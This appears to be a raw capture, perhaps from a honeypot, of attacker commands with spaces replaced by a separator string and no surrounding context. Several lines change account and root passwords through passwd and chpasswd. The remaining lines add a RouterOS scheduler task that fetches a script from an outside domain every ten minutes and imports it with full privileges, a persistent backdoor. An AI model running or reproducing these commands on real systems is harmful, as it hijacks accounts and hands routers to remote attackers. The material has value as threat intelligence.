echo -|::|- "adminserver\\n3TaDPhAtfDF6\\n3TaDPhAtfDF6\\n" -|::|- passwd
echo -|::|- "qwe@123\\nN39CnRP7OkOr\\nN39CnRP7OkOr\\n" -|::|- passwd
echo -|::|- letmein\\n9k3AoNNacrPj\\n9k3AoNNacrPj\\n" -|::|- passwd
echo -|::|- "swingbylabs\\naFiJeMWfF7Eq\\naFiJeMWfF7Eq\\n" -|::|- passwd
echo -|::|- "admin\\nOJWKUhyCQYwU\\nOJWKUhyCQYwU\\n" -|::|- passwd
echo -|::|- "root:AEsndTYzVY9i" -|::|- chpasswd -|::|- bash
echo -|::|- "root:RkdzeP5xSBEN" -|::|- chpasswd -|::|- bash
echo -|::|- "root:cr1mM0SwfHZz" -|::|- chpasswd -|::|- bash
system -|::|- scheduler -|::|- add -|::|- name="U6" -|::|- interval=10m -|::|- on-event="/tool -|::|- fetch -|::|- url=http://strtbiz.site/poll/d6633796-87cb-4028-a93b-432df89e383f -|::|- mode=http -|::|- dst-path=7wmp0b4s.rsc\\r\ -|::|- import -|::|- 7wmp0b4s.rsc -|::|- policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
system -|::|- scheduler -|::|- add -|::|- name="U6" -|::|- interval=10m -|::|- on-event="/tool -|::|- fetch -|::|- url=http://bestony.club/poll/9d0479ac-2889-44fc-bcf4-238320aac82b -|::|- mode=http -|::|- dst-path=7wmp0b4s.rsc\\r\ -|::|- import -|::|- 7wmp0b4s.rsc -|::|- policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
system -|::|- scheduler -|::|- add -|::|- name="U6" -|::|- interval=10m -|::|- on-event="/tool -|::|- fetch -|::|- url=http://myfrance.xyz/poll/489f9f54-b2f2-4adf-84fc-bddee250565d -|::|- mode=http -|::|- dst-path=7wmp0b4s.rsc\\r\ -|::|- import -|::|- 7wmp0b4s.rsc" -|::|- policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write